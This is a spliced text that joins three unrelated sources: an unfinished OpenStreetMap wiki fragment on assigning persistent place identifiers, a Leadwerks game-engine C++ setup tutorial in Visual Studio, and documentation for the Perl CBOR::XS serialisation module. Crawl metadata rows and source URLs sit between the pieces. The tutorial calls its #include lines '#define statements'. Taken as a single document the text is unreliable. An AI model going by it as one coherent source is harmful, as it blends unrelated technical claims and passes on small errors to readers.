The rules to say "ok this OSM feature can be assigned to a perma_id", because (supposing to) we can't assign a perma_id to all nodes of the OSM map, there are a "preservation cost", so we must to reduce or to avoid exaggerations.
Supposing all elements passed in a simple "stability check" and potential watchers before assign, there are two main ways to assign:
- Automatic assign: by Wikidata tag, and/or "importance threshold" to cut non-relevant map features.
- Human decision: voting pull, in a scale-related watchers (city or country) local community.
Ideal and practical position-reference
The "has error-position reference" property (see begin of the page) to ensure that a OSM feature not changed its position — with OSM-user edits in the map, or with some natural evolution of the reality.
The ideal is transformation like TopoJSON, ST_Simplify, etc. but, for practical and low-cost implementation, the only "last position in the map before changes" that we need to check is the centroid (eg. PostGIS's ST_PointOnSurface) or the BBOX, and validate changes against some error-position criteria (see "Defining spatial scale" above).
The "change validation" algorithm is not so simple... And can be implemented in only one or in many moments of the workflow:
- On an OSM's editor: ideal as pre-processing some basic validation and warning user...
- On the OSM's Editing API: the correct locus for ensure continuous control and quality.
- On a quality-control tool: a "long time" checker (eg. each year) and review task. System low-impact, software low-cost, but human high cost. Ideal for first experiments with perma_id.
... (under construction)...
FAQ and perhaps false criticisms
Frequently Asked Questions and frequent criticism with, perhaps (on the facts explained in this page), false premises.
... (under construction)...
...
... (under construction)... | https://wiki.openstreetmap.org/wiki/Persistent_Place_Identifier | CC-MAIN-2021-43 | refinedweb | 1,664 | 53 |
Setting up the VS 2010 projectNow that we've finished building our level it is now time to begin the coding side of the project. For this lesson, we will be using Visual Studio 2010 on Windows, but you can follow the equivalent steps for Xcode on Mac. Right-click on the project name in the project list and select the Open Folder menu item from the context menu that pops up. This will open the project folder in Windows Explorer (or Finder on Mac). Navigate to the Projects/Windows folder and open the file MyGame.sln. At this point in time we are going to create a few blank C++ and Header files that we will be fleshing out throughout the tutorial.
Creating C++ FilesIn the Visual Studio's Solution Explorer (normally located on the left side of the screen) right click on the Source folder and select Add->New Item, A new item window will pop up and we are going to select "C++ File (.cpp)" and name the file "Player" we also want to change the location of this file so on the right side of "Location" click the browse button and navigate to "MyGame/Source" and click "Select Folder" finally click Add and our new Player.cpp file will appear in the Solution Explorer. We will also want a "Node.cpp" file so repeat the process again but this time name the file "Node".
Creating Header FilesAdding header files into Visual Studios 2010 is essentially the same process as adding in a cpp file. This time we will click on the "Header Files" folder in the solution explorer, right click and select Add->New Item. The window from before will pop up, but now we select "Header File (.h)" instead. Once again we will want these files saved in the "MyGame/Source" folder so remember to save to the correct folder. We are going to make three headers for this tutorial so repeat the steps of adding a new file for Player.h, Node.h, and MyGame.h.
MyGame.hInside MyGame.h we are going to set a series of #define statements that will allow other files to just make a single #define call. You will notice a call to #pragma once, this is a preprocessor directive that says "only include the following files if they're not already included". After this call we insert #define calls to leadwerks.h, node.h, and player.h:
#pragma once #include "Leadwerks.h" #include "Node.h" #include "Player.h"
App ClassBy default the App class contains two functions for structuring a game. App::Start() will be called when the game begins, and App::Loop() will be called continuously until the game ends. Inside App.h we are going to remove the default camera and add in a Player, the resulting file should look as such:
#pragma once #include "Leadwerks.h" #include "MyGame.h" using namespace Leadwerks; class App { public: Window* window; Context* context; World* world; Player* player; App(); virtual ~App(); virtual bool Start(); virtual bool Loop(); };Since we removed the default camera from App.h we will also need to remove the initialization call within the App constructor inside App.cpp:
App::App() : window(NULL), context(NULL), world(NULL){}Next we are going to create a new instance of a player in App::Start() as well as call the player's Update function in App::Loop():
//Create the player player = new Player; //Update the player player->Update();Also inside the App::Start() function, we are going to load an ambient background sound, then have that sound play on a continuous loop. (We'll replace this with something more advanced later on, but this is fine for now):
Sound* sound = Sound::Load("Sound/Ambient/cryogenic_room_tone_10.wav"); Source* source = Source::Create(); source->SetSound(sound); source->SetLoopMode(true); source->Play();By the end of these changes your finished App class should look like the following:
#include "App.h" #include "MyGame.h" using namespace Leadwerks; App::App() : window(NULL), context(NULL), world(NULL) {} App::~App() { //delete world; delete window; } bool App::Start() { //Create a window window = Window::Create("MyGame"); //Create a context context = Context::Create(window); //Create a world world = World::Create(); //Create the player player = new Player; std::string mapname = System::GetProperty("map","Maps/start.map"); if (!Map::Load(mapname)) Debug::Error("Failed to load map \""+mapname+"\"."); //Move the mouse to the center of the screen window->HideMouse(); window->SetMousePosition(context->GetWidth()/2,context->GetHeight()/2); Sound* sound = Sound::Load("Sound/Ambient/cryogenic_room_tone_10.wav"); Source* source = Source::Create(); source->SetSound(sound); source->SetLoopMode(true); source->Play(); world->SetAmbientLight(0,0,0,1); return true; } bool App::Loop() { //Close the window to end the program if (window->Closed() || window->KeyDown(Key::Escape)) return false; //Update the game timing Time::Step(); //Update the world world->Update(); //Update the player player->Update(); //Render the world world->Render(); //Sync the context context->Sync(true); return true; }
Node ClassNext we are going to create a base class which we will call Node. All classes in our game will be derived from this base class. This is called inheritance, because each class inherits members and functions from the class it's derived from. We can override inherited class functions with new ones, allowing us to create and extend behavior without rewriting all our code each time. The Node class itself will be derived from the Leadwerks Object class, which is the base class for all objects in Leadwerks. This will give us a few useful features right off the bat. Our Node class can use reference counting, and it can also be easily passed to and from Lua. The node header file will get just one member, an Entity object:
#pragma once #include "MyGame.h" using namespace Leadwerks; class Node : public Object { public: Entity* entity; Node(); virtual ~Node(); };In the Node.cpp file, we'll add the code for the Node constructor and destructor:
#include "MyGame.h" Node::Node() : entity(NULL) { } Node::~Node() { if (entity) { if (entity->GetUserData()==this) entity->SetUserData(NULL); entity->Release(); entity = NULL; } }Our code foundation has now been laid and it is finally time to move onto developing the player class, which will be the subject of our next lesson.
You need to be a member in order to leave a comment
Sign up for a new account in our community. It's easy!Register a new account
Already have an account? Sign in here.Sign In Now | https://www.gamedev.net/articles/programming/general-and-gameplay-programming/building-a-first-person-shooter-part-11-visual-studio-setup-r3099/ | CC-MAIN-2019-39 | refinedweb | 1,074 | 61.46 |
Eclipse Community Forums - RDF feed Eclipse Community Forums UserRegion Does not work... Please help <![CDATA[Originally posted by: confmb.capgroup.com I sent a message a few days ago about issues I am having with UserRegion - unfortunately nobody replied and I think it is because the message was somewhat lost in the thread. Therefore I am resending the post - please - please - please help - Below I include my full template - in order to be more specific. A few important remark: - I do have multiple user region. Is this ok? - The user region inside the constructor never works - the code is overwritten everytime. - The third user region almosr never works - code overwritten everytime. But I think I saw it working before on occasions (not sure). - The second user region works almost always. Except that it works in reverse - that is if I leave the tag @generated_OtherConstructor alone then it does not overwritte my code. If I chnage the tag to @!generated_OtherConstructor - then it overwrite the code. This is the opposite behavior from what is explained in the documentation. Pretty wierd isn't it? - I have the text string "generated" somewhere in the comments of the class. Does it matter? Isn't the tool suppose to parse the text of the class and only worry about what is inside the user region markup comments? For me these markups are : // BEGIN user region <OtherMethod> and // END user region <OtherMethod> Are they ok? Is there a specific convention I should follow? - About the unmodifiedMarker. Since I have multiple user regions in the class then these markups have different names. Is this ok? If not how could jet distinguish between regions? I hope this is more specific and will help find out what is going on. If you can solve this problem for me then I will certainly be very grateful. This issue is preventing us from using jet more within our company. We need to have some generated code be customized by the users and not overwritten later. Thanks a lot in adavance. 
Frederic ___________________________Beginning of template_________________________ <c:include package <c:get; <java:importsLocation /** * Documentation for the class <c:get: * * This class contains the business functionality method associated with this class. * The infrastructure functionality for this class is auto generated and is implemented in the class '{@link <java:import><c:get._g.<c:get_g</java:import>}'. * <c:if * <c:get * </c:if> * * You can change the code in the user region. To prevent your changes from being overwritten the next time the code is regenerated - please remove the @generated tag. */ <c:include <c:include public class <c:get extends <java:import><c:get._g.<c:get_g</java:import> { <c:if <c:include </c:if> /** * This is the default constructor. */ public <c:get() { super(); <c:userRegion> // BEGIN user region <DefaultConstructor> <c:initialCode // @generated_DefaultConstructor // initial code here... </c:initialCode> // END user region <DefaultConstructor> </c:userRegion> } <c:userRegion> // BEGIN user region <OtherConstructor> <c:initialCode // @generated_OtherConstructor // initial code here... </c:initialCode> // END user region <OtherConstructor> </c:userRegion> <c:userRegion> // BEGIN user region <OtherMethod> <c:initialCode // @generated_OtherMethod // initial code here... </c:initialCode> // END user region <OtherMethod> </c:userRegion> } ___________________________End of template_________________________]]> 2008-03-14T17:46:01-00:00 Update: UserRegion Does not work... Please help <![CDATA[Originally posted by: confmb.capgroup.com I downloaded the latest jet - version 9.0 from March 2008. I am now able to make ONE user region work. This is quite good indeed. But I am still wondering - is multiple user region supported or not? Can someone tell me? Because obviously if it is not then I should not spend time trying to make it work. I just would like to know. 
Thank you, Frederic]]> 2008-03-14T18:58:17-00:00 Latest Update: UserRegion Does not work... Please help <![CDATA[Originally posted by: confmb.capgroup]]> 2008-03-14T19:15:28-00:00 Re: Latest Update: UserRegion Does not work... Please help <![CDATA[Frederic: As I said on another thread, there was an issue in 0.8.1, which is fixed in 0.8.2 and 0.9.0 Thanks for your patience and persistence. Paul "Frederic" <[email protected]> wrote in message news:cb67bf2e336c5b3d5986a8936b9e63fa >]]> Paul Elder 2008-03-26T14:16:09-00:00 | http://www.eclipse.org/forums/feed.php?mode=m&th=13632&basic=1 | CC-MAIN-2013-48 | refinedweb | 699 | 60.61 |
ADD/COPY files with sbt-native-packager's docker support
I’m using sbt-native-packager 1.0.0-M5 to create my docker image. I need to add a file that’s not a source file or in the resource folder. My docker commands are as follows:
dockerCommands := Seq( Cmd("FROM", "myrepo/myImage:1.0.0"), Cmd("COPY", "test.txt keys/"), // <-- The failing part Cmd("WORKDIR", "/opt/docker"), Cmd("RUN", "[\"chown\", \"-R\", \"daemon\", \".\"]"), Cmd("USER", "daemon"), ExecCmd("CMD", "echo", "Hello, World from Docker") )
It fails with:
msg="test.txt: no such file or directory"
So after digging around a bit it seems I need to have
test.txt in
target/docker/stage. Then it works. But how do I get it there automatically? The file is actually in the root folder of the project.
4 Solutions collect form web for “ADD/COPY files with sbt-native-packager's docker support”
I managed to get it to work by adding the file to
mappings in Universal. So for you, you would need something like this:
mappings in Universal += file("test.txt") -> "keys/test.txt"
You won’t need the
COPY command if you do this, by the way.
Now, I’m not sure if this is going to add this mapping to other sbt-native-packager plugins. I hope a commenter can tell me whether or not this is true, but my intuition is that it will do so, which might be a dealbreaker for you. But any workaround is better than none, right? If you use
Build.scala you could maybe use a VM argument to tell
sbt whether or not to add this mapping…
I was able to get this working using
dockerPackageMappings:
dockerPackageMappings in Docker += (baseDirectory.value / "docker" / "ssh_config") -> "ssh_config" dockerCommands := (dockerCommands.value match { case Seq(from@Cmd("FROM", _), rest@_*) => Seq( from, Cmd("Add", "ssh_config", "/sbin/.ssh/config") ) ++ rest })
I was able to add files this way:
For example, to add a file located in
src/main/resources/docker/some-file.ext
dockerfile in docker := { val targetPath = "/usr/app" // map of (relativeName -> File) of all files in resources/docker dir, for convenience val dockerFiles = { val resources = (unmanagedResources in Runtime).value val dockerFilesDir = resources.find(_.getPath.endsWith("/docker")).get resources.filter(_.getPath.contains("/docker/")).map(r => dockerFilesDir.toURI.relativize(r.toURI).getPath -> r).toMap } new Dockerfile { from(s"$namespace/$baseImageName:$baseImageTag") ... add(dockerFiles("some-file.ext"), s"$targetPath/some-file.ext") ... } }
You may place all additional files (which must be included in container image) into folder
src/universal. Content of that folder will be automatically copied in
/opt/app folder within your container image. You don’t need any additional configuration. See “Getting started with Universal Packaging” for additional info. | http://dockerdaily.com/addcopy-files-with-sbt-native-packagers-docker-support/ | CC-MAIN-2018-26 | refinedweb | 456 | 50.73 |
- NAME
- SYNOPSIS
- DESCRIPTION
- FUNCTIONAL INTERFACE
- OBJECT-ORIENTED INTERFACE
- MAPPING
- MAGIC HEADER
- THE CBOR::XS::Tagged CLASS
- TAG HANDLING AND EXTENSIONS
- CBOR and JSON
- SECURITY CONSIDERATIONS
- BIGNUM SECURITY CONSIDERATIONS
- CBOR IMPLEMENTATION NOTES
- LIMITATIONS ON PERLS WITHOUT 64-BIT INTEGER SUPPORT
- THREADS
- BUGS
- SEE ALSO
- AUTHOR
NAME
CBOR::XS - Concise Binary Object Representation (CBOR, RFC7049)
SYNOPSIS
use CBOR::XS; $binary_cbor_data = encode_cbor $perl_value; $perl_value = decode_cbor $binary_cbor_data; # OO-interface $coder = CBOR::XS->new; $binary_cbor_data = $coder->encode ($perl_value); $perl_value = $coder->decode ($binary_cbor_data); # prefix decoding my $many_cbor_strings = ...; while (length $many_cbor_strings) { my ($data, $length) = $cbor->decode_prefix ($many_cbor_strings); # data was decoded substr $many_cbor_strings, 0, $length, ""; # remove decoded cbor string }
DESCRIPTION
This module converts Perl data structures to the Concise Binary Object Representation (CBOR) and vice versa. CBOR is a fast binary serialisation format that aims to use an (almost) superset of the JSON data model, i.e. when you can represent something useful in JSON, you should be able to represent it in CBOR.
In short, CBOR is a faster and quite compact binary alternative to JSON, with the added ability of supporting serialisation of Perl objects. (JSON often compresses better than CBOR though, so if you plan to compress the data later and speed is less important you might want to compare both formats first).
To give you a general idea about speed, with texts in the megabyte range,
CBOR::XS usually encodes roughly twice as fast as Storable or JSON::XS and decodes about 15%-30% faster than those. The shorter the data, the worse Storable performs in comparison.
Regarding compactness,
CBOR::XS-encoded data structures are usually about 20% smaller than the same data encoded as (compact) JSON or Storable.
In addition to the core CBOR data format, this module implements a number of extensions, to support cyclic and shared data structures (see
allow_sharing and
allow_cycles), string deduplication (see
pack_strings) and scalar references (always enabled).
The primary goal of this module is to be correct and the secondary goal is to be fast. To reach the latter goal it was written in C.
See MAPPING, below, on how CBOR::XS maps perl values to CBOR values and vice versa.
FUNCTIONAL INTERFACE
The following convenience methods are provided by this module. They are exported by default:
- $cbor_data = encode_cbor $perl_scalar
Converts the given Perl data structure to CBOR representation. Croaks on error.
- $perl_scalar = decode_cbor $cbor_data
The opposite of
encode_cbor: expects a valid CBOR string to parse, returning the resulting perl scalar. Croaks on error.
OBJECT-ORIENTED INTERFACE
The object oriented interface lets you configure your own encoding or decoding style, within the limits of supported formats.
- $cbor = new CBOR::XS
Creates a new CBOR::XS object that can be used to de/encode CBOR strings. All boolean flags described below are by default disabled.
The mutators for flags all return the CBOR object again and thus calls can be chained:
my $cbor = CBOR::XS->new->encode ({a => [1,2]});
- $cbor = $cbor->max_depth ([$maximum_nesting_depth])
-
- $max_depth = $cbor->get_max_depth
Sets the maximum nesting level (default
512) accepted while encoding or decoding. If a higher nesting level is detected in CBOR data.
- $cbor = $cbor->max_size ([$maximum_string_size])
-
- $max_size = $cbor->get_max_size
Set the maximum length a CBOR string.
- $cbor = $cbor->allow_unknown ([$enable])
-
- $enabled = $cbor->get_allow_unknown
If
$enableis true (or missing), then
encodewill not throw an exception when it encounters values it cannot represent in CBOR (for example, filehandles) but instead will encode a CBOR
errorvalue.
If
$enableis false (the default), then
encodewill throw an exception when it encounters anything it cannot encode as CBOR.
This option does not affect
decodein any way, and it is recommended to leave it off unless you know your communications partner.
- $cbor = $cbor->allow_sharing ([$enable])
-
- $enabled = $cbor->get_allow_sharing
If
$enableis true (or missing), then
encodewill not double-encode values that have been referenced before (e.g. when the same object, such as an array, is referenced multiple times), but instead will emit a reference to the earlier value.
This means that such values will only be encoded once, and will not result in a deep cloning of the value on decode, in decoders supporting the value sharing extension. This also makes it possible to encode cyclic data structures (which need
allow_cyclesto ne enabled to be decoded by this module).
It is recommended to leave it off unless you know your communication partner supports the value sharing extensions to CBOR (), as without decoder support, the resulting data structure might be unusable.
Detecting shared values incurs a runtime overhead when values are encoded that have a reference counter large than one, and might unnecessarily increase the encoded size, as potentially shared values are encode as shareable whether or not they are actually shared.
At the moment, only targets of references can be shared (e.g. scalars, arrays or hashes pointed to by a reference). Weirder constructs, such as an array with multiple "copies" of the same string, which are hard but not impossible to create in Perl, are not supported (this is the same as with Storable).
If
$enableis false (the default), then
encodewill encode shared data structures repeatedly, unsharing them in the process. Cyclic data structures cannot be encoded in this mode.
This option does not affect
decodein any way - shared values and references will always be decoded properly if present.
- $cbor = $cbor->allow_cycles ([$enable])
-
- $enabled = $cbor->get_allow_cycles
If $enable is true (or missing), then decode will happily decode self-referential (cyclic) data structures. By default these will not be decoded, as they need manual cleanup to avoid memory leaks, so code that isn't prepared for this will not leak memory.
If $enable is false (the default), then decode will throw an error when it encounters a self-referential/cyclic data structure.
FUTURE DIRECTION: the motivation behind this option is to avoid real cycles - future versions of this module might chose to decode cyclic data structures using weak references when this option is off, instead of throwing an error.
This option does not affect encode in any way - shared values and references will always be encoded properly if present.
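A minimal sketch (the cyclic structure must have been encoded with allow_sharing enabled, as described above):

use CBOR::XS;

my $node = { name => "root" };
$node->{self} = $node;             # a cycle

my $cbor = CBOR::XS->new->allow_sharing->encode ($node);

# default: decoding a cyclic structure throws an error
my $ok = eval { CBOR::XS->new->decode ($cbor); 1 };   # $ok stays false

# with allow_cycles, the cycle is reconstructed - the caller is now
# responsible for breaking it (e.g. with Scalar::Util::weaken) to
# avoid leaking memory
my $copy = CBOR::XS->new->allow_cycles->decode ($cbor);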
- $cbor = $cbor->pack_strings ([$enable])
-
- $enabled = $cbor->get_pack_strings
If $enable is true (or missing), then encode will try not to encode the same string twice, but will instead encode a reference to the string. Depending on your data format, this can save a lot of space, but also results in a very large runtime overhead (expect encoding times to be 2-4 times as high as without).
It is recommended to leave it off unless you know your communications partner supports the stringref extension to CBOR (), as without decoder support, the resulting data structure might not be usable.
If $enable is false (the default), then encode will encode strings the standard CBOR way.
This option does not affect decode in any way - string references will always be decoded properly if present.
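A sketch of the space/time trade-off on data with many repeated strings:

use CBOR::XS;

# many repeated hash keys and values - a good candidate for string packing
my @rows = map { { colour => "ultramarine", shape => "triangle" } } 1 .. 1000;

my $plain  = encode_cbor \@rows;
my $packed = CBOR::XS->new->pack_strings->encode (\@rows);

# $packed is considerably shorter: after the first occurrence, repeated
# strings are emitted as small stringref integers - at the cost of a
# noticeably slower encode

As noted above, the receiving side must support the stringref extension (this module decodes it automatically).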
- $cbor = $cbor->text_keys ([$enable])
-
- $enabled = $cbor->get_text_keys
If $enable is true (or missing), then encode will encode all perl hash keys as CBOR text strings/UTF-8 strings, upgrading them as needed.
If $enable is false (the default), then encode will encode hash keys normally - upgraded perl strings (strings internally encoded as UTF-8) as CBOR text strings, and downgraded perl strings as CBOR byte strings.
This option does not affect decode in any way.
This option is useful for interoperability with CBOR decoders that don't treat byte strings as a form of text. It is especially useful as Perl gives very little control over hash keys.
Enabling this option can be slow, as all downgraded hash keys that are encoded need to be scanned and converted to UTF-8.
- $cbor = $cbor->text_strings ([$enable])
-
- $enabled = $cbor->get_text_strings
This option works similarly to text_keys, above, but works on all strings (including hash keys), so text_keys has no further effect after enabling text_strings.
If $enable is true (or missing), then encode will encode all perl strings as CBOR text strings/UTF-8 strings, upgrading them as needed.
If $enable is false (the default), then encode will encode strings normally (but see text_keys) - upgraded perl strings (strings internally encoded as UTF-8) as CBOR text strings, and downgraded perl strings as CBOR byte strings.
This option does not affect decode in any way.
This option has similar advantages and disadvantages as text_keys. In addition, this option effectively removes the ability to encode byte strings, which might break some FREEZE and TO_CBOR methods that rely on this, such as bignum encoding, so this option is mainly useful for very simple data.
- $cbor = $cbor->validate_utf8 ([$enable])
-
- $enabled = $cbor->get_validate_utf8
If $enable is true (or missing), then decode will validate that elements (text strings) containing UTF-8 data in fact contain valid UTF-8 data (instead of blindly accepting it). This validation obviously takes extra time during decoding.
The concept of "valid UTF-8" used is perl's concept, which is a superset of the official UTF-8.
If $enable is false (the default), then decode will blindly accept UTF-8 data, marking them as valid UTF-8 in the resulting data structure regardless of whether that's true or not.
Perl isn't too happy about corrupted UTF-8 in strings, but should generally not crash or do similarly evil things. Extensions might be not so forgiving, so it's recommended to turn on this setting if you receive untrusted CBOR.
This option does not affect encode in any way - strings that are supposedly valid UTF-8 will simply be dumped into the resulting CBOR string without checking whether that is, in fact, true or not.
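For untrusted input, a typical pattern is to enable validation and trap the resulting exception ($untrusted_bytes stands in for whatever your application received):

use CBOR::XS;

my $cbor = CBOR::XS->new->validate_utf8;

# invalid UTF-8 inside a text string now raises an exception instead of
# smuggling malformed "UTF-8" into the decoded Perl strings
my $data = eval { $cbor->decode ($untrusted_bytes) };
die "invalid CBOR or invalid UTF-8: $@" if $@;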
- $cbor = $cbor->filter ([$cb->($tag, $value)])
-
- $cb_or_undef = $cbor->get_filter
Sets or replaces the tagged value decoding filter (when $cb is specified) or clears the filter (if no argument or undef is provided).
The filter callback is called only during decoding, when a non-enforced tagged value has been decoded (see "TAG HANDLING AND EXTENSIONS" for a list of enforced tags). For specific tags, it's often better to provide a default converter using the %CBOR::XS::FILTER hash (see below).
The first argument is the numerical tag, the second is the (decoded) value that has been tagged.
The filter function should return either exactly one value, which will replace the tagged value in the decoded data structure, or no values, which will result in default handling, which currently means the decoder creates a CBOR::XS::Tagged object to hold the tag and the value.
When the filter is cleared (the default state), the default filter function, CBOR::XS::default_filter, is used. This function simply looks up the tag in the %CBOR::XS::FILTER hash. If an entry exists it must be a code reference that is called with tag and value, and is responsible for decoding the value. If no entry exists, it returns no values.
Example: decode all tags not handled internally into CBOR::XS::Tagged objects, with no other special handling (useful when working with potentially "unsafe" CBOR data).
CBOR::XS->new->filter (sub { })->decode ($cbor_data);
Example: provide a global filter for tag 1347375694, converting the value into some string form.
$CBOR::XS::FILTER{1347375694} = sub { my ($tag, $value) = @_; "tag 1347375694 value $value" };
- $cbor_data = $cbor->encode ($perl_scalar)
Converts the given Perl data structure (a scalar value) to its CBOR representation.
- $perl_scalar = $cbor->decode ($cbor_data)
The opposite of encode: expects CBOR data and tries to parse it, returning the resulting simple scalar or reference. Croaks on error.
- ($perl_scalar, $octets) = $cbor->decode_prefix ($cbor_data)
This works like the decode method, but instead of raising an exception when there is trailing garbage after the CBOR string, it will silently stop parsing there and return the number of characters consumed so far.

This is useful if your CBOR texts are not delimited by an outer protocol and you need to know where the first CBOR string ends and the next one starts.
CBOR::XS->new->decode_prefix ("......") => ("...", 3)
INCREMENTAL PARSING
In some cases, there is the need for incremental parsing of CBOR texts. While this module always has to keep both CBOR text and resulting Perl data structure in memory at one time, it does allow you to parse a CBOR stream incrementally, in a way similar to using "decode_prefix" to see if a full CBOR object is available, but much more efficiently.
It basically works by parsing as much of a CBOR string as possible - if the CBOR data is not complete yet, the parser will remember where it was, to be able to restart when more data has been accumulated. Once enough data is available to either decode a complete CBOR value or raise an error, a real decode will be attempted.
A typical use case would be a network protocol that consists of sending and receiving CBOR-encoded messages. The solution that works with CBOR and about anything else is by prepending a length to every CBOR value, so the receiver knows how many octets to read. More compact (and slightly slower) would be to just send CBOR values back-to-back, as
CBOR::XS knows where a CBOR value ends, and doesn't need an explicit length.
The following methods help with this:
- @decoded = $cbor->incr_parse ($buffer)
This method attempts to decode exactly one CBOR value from the beginning of the given $buffer. The value is removed from the $buffer on success. When $buffer doesn't contain a complete value yet, it returns nothing. Finally, when the $buffer doesn't start with something that could ever be a valid CBOR value, it raises an exception, just as decode would. In the latter case the decoder state is undefined and must be reset before being able to parse further.
This method modifies the $buffer in place. When no CBOR value can be decoded, the decoder stores the current string offset. On the next call, it continues decoding at the place where it stopped before. For this to make sense, the $buffer must begin with the same octets as on previous unsuccessful calls.
You can call this method in scalar context, in which case it either returns a decoded value or undef. This makes it impossible to distinguish between CBOR null values (which decode to undef) and an unsuccessful decode, which is often acceptable.
- @decoded = $cbor->incr_parse_multiple ($buffer)
Same as incr_parse, but attempts to decode as many CBOR values as possible in one go, instead of at most one. Calls to incr_parse and incr_parse_multiple can be interleaved.
- $cbor->incr_reset
Resets the incremental decoder. This throws away any saved state, so that subsequent calls to incr_parse or incr_parse_multiple start to parse a new CBOR value from the beginning of the $buffer again.
This method can be called at any time, but it must be called if you want to change your $buffer or there was a decoding error and you want to reuse the $cbor object for future incremental parsings.
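Putting the methods together, a receive loop for back-to-back CBOR values might look like the following sketch (read_more and handle_message are application-defined stand-ins for your actual I/O and dispatch):

use CBOR::XS;

my $cbor = CBOR::XS->new;
my $buf  = "";

while (1) {
   # append whatever has arrived; read_more is assumed to return
   # undef at end of stream
   defined (my $chunk = read_more ()) or last;
   $buf .= $chunk;

   # extract as many complete CBOR values as are available
   my @values = eval { $cbor->incr_parse_multiple ($buf) };
   if ($@) {
      $cbor->incr_reset;   # decoder state is undefined after an error
      die "protocol error: $@";
   }

   handle_message ($_) for @values;
}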
MAPPING
This section describes how CBOR::XS maps Perl values to CBOR.
CBOR -> PERL
- integers
CBOR integers become (numeric) perl scalars. On perls without 64 bit support, 64 bit integers will be truncated or otherwise corrupted.
- byte strings
Byte strings will become octet strings in Perl (the Byte values 0..255 will simply become characters of the same value in Perl).
- UTF-8 strings
UTF-8 strings in CBOR will be decoded, i.e. the UTF-8 octets will be decoded into proper Unicode code points. At the moment, the validity of the UTF-8 octets will not be validated - corrupt input will result in corrupted Perl strings.
- arrays, maps
CBOR arrays and CBOR maps will be converted into references to a Perl array or hash, respectively. The keys of the map will be stringified during this process.
- null
CBOR null becomes undef in Perl.
- true, false, undefined
These CBOR values become Types::Serialiser::true, Types::Serialiser::false and Types::Serialiser::error, respectively. They are overloaded to act almost exactly like the numbers 1 and 0 (for true and false) or to throw an exception on access (for error). See the Types::Serialiser manpage for details.
- tagged values
Tagged items consist of a numeric tag and another CBOR value.
See "TAG HANDLING AND EXTENSIONS" and the description of
->filterfor details on which tags are handled how.
- anything else
Anything else (e.g. unsupported simple values) will raise a decoding error.
PERL -> CBOR
The mapping from Perl to CBOR is slightly more difficult, as Perl is a typeless language. That means this module can only guess which CBOR type is meant by a perl value.
- hash references
Perl hash references become CBOR maps. As there is no inherent ordering in hash keys (or CBOR maps), they will usually be encoded in a pseudo-random order. This order can be different each time a hash is encoded.
Currently, tied hashes will use the indefinite-length format, while normal hashes will use the fixed-length format.
- array references
Perl array references become fixed-length CBOR arrays.
- other references
Other unblessed references will be represented using the indirection tag extension (tag value 22098). CBOR decoders are guaranteed to be able to decode these values somehow, by either "doing the right thing", decoding into a generic tagged object, simply ignoring the tag, or something else.
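For example, a scalar reference round-trips through the indirection tag:

use CBOR::XS;

my $answer = 42;
my $cbor   = encode_cbor [\$answer];   # scalar ref => tag 22098 (indirection)

my $back = decode_cbor $cbor;
# $back->[0] is again a scalar reference; ${ $back->[0] } is 42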
- CBOR::XS::Tagged objects
Objects of this type must be arrays consisting of a single [tag, value] pair. The (numerical) tag will be encoded as a CBOR tag, the value will be encoded as appropriate for the value. You must use CBOR::XS::tag to create such objects.
- Types::Serialiser::true, Types::Serialiser::false, Types::Serialiser::error
These special values become CBOR true, CBOR false and CBOR undefined values, respectively. You can also use \1, \0 and \undef directly if you want.
- other blessed objects
Other blessed objects are serialised via TO_CBOR or FREEZE. See "TAG HANDLING AND EXTENSIONS" for specific classes handled by this module, and "OBJECT SERIALISATION" for generic object serialisation.
- simple scalars
Simple Perl scalars (any scalar that is not a reference) are the most difficult objects to encode: CBOR::XS will encode undefined scalars as CBOR null values, scalars that have last been used in a string context before encoding as CBOR strings, and anything else as number value:
# dump as number
encode_cbor [2]       # yields [2]
encode_cbor [-3.0e17] # yields [-3e+17]
my $value = 5;
encode_cbor [$value]  # yields [5]

# used as string, so dump as string (either byte or text)
print $value;
encode_cbor [$value]  # yields ["5"]

# undef becomes null
encode_cbor [undef]   # yields [null]
You can force the type to be a CBOR string by stringifying it:
my $x = 3.1; # some variable containing a number
"$x";        # stringified
$x .= "";    # another, more awkward way to stringify
print $x;    # perl does it for you, too, quite often
You can force whether a string is encoded as byte or text string by using utf8::upgrade and utf8::downgrade (if text_strings is disabled):
utf8::upgrade $x;   # encode $x as text string
utf8::downgrade $x; # encode $x as byte string
Perl doesn't define what operations up- and downgrade strings, so if the difference between byte and text is important, you should up- or downgrade your string as late as possible before encoding. You can also force the use of CBOR text strings by using text_keys or text_strings.
You can force the type to be a CBOR number by numifying it:

my $x = "3"; # some variable containing a string
$x += 0;     # numify it, ensuring it will be dumped as a number
$x *= 1;     # same thing, the choice is yours :).
Perl values that seem to be integers generally use the shortest possible representation. Floating-point values will use either the IEEE single format if possible without loss of precision, otherwise the IEEE double format will be used. Perls that use formats other than IEEE double to represent numerical values are supported, but might suffer loss of precision.
OBJECT SERIALISATION
This module implements both a CBOR-specific and the generic Types::Serialiser object serialisation protocol. The following subsections explain both methods.
ENCODING
This module knows two ways to serialise a Perl object: the CBOR-specific way, and the generic way.
Whenever the encoder encounters a Perl object that it cannot serialise directly (most of them), it will first look up the
TO_CBOR method on it.
If it has a
TO_CBOR method, it will call it with the object as only argument, and expects exactly one return value, which it will then substitute and encode it in the place of the object.
Otherwise, it will look up the
FREEZE method. If it exists, it will call it with the object as first argument, and the constant string
CBOR as the second argument, to distinguish it from other serialisers.
The FREEZE method can return any number of values (i.e. zero or more). These will be encoded as a CBOR perl object, together with the classname.
These methods MUST NOT change the data structure that is being serialised. Failure to comply to this can result in memory corruption - and worse.
If an object supports neither
TO_CBOR nor
FREEZE, encoding will fail with an error.
DECODING
Objects encoded via
TO_CBOR cannot (normally) be automatically decoded, but objects encoded via
FREEZE can be decoded using the following protocol:
When an encoded CBOR perl object is encountered by the decoder, it will look up the
THAW method, by using the stored classname, and will fail if the method cannot be found.
After the lookup it will call the
THAW method with the stored classname as first argument, the constant string
CBOR as second argument, and all values returned by
FREEZE as remaining arguments.
EXAMPLES
Here is an example
TO_CBOR method:
sub My::Object::TO_CBOR {
   my ($obj) = @_;

   ["this is a serialised My::Object object", $obj->{id}]
}
When a
My::Object is encoded to CBOR, it will instead encode a simple array with two members: a string, and the "object id". Decoding this CBOR string will yield a normal perl array reference in place of the object.
A more useful and practical example would be a serialisation method for the URI module. CBOR has a custom tag value for URIs, namely 32:
sub URI::TO_CBOR {
   my ($self) = @_;

   my $uri = "$self"; # stringify uri
   utf8::upgrade $uri; # make sure it will be encoded as UTF-8 string
   CBOR::XS::tag 32, $uri
}
This will encode URIs as a UTF-8 string with tag 32, which indicates an URI.
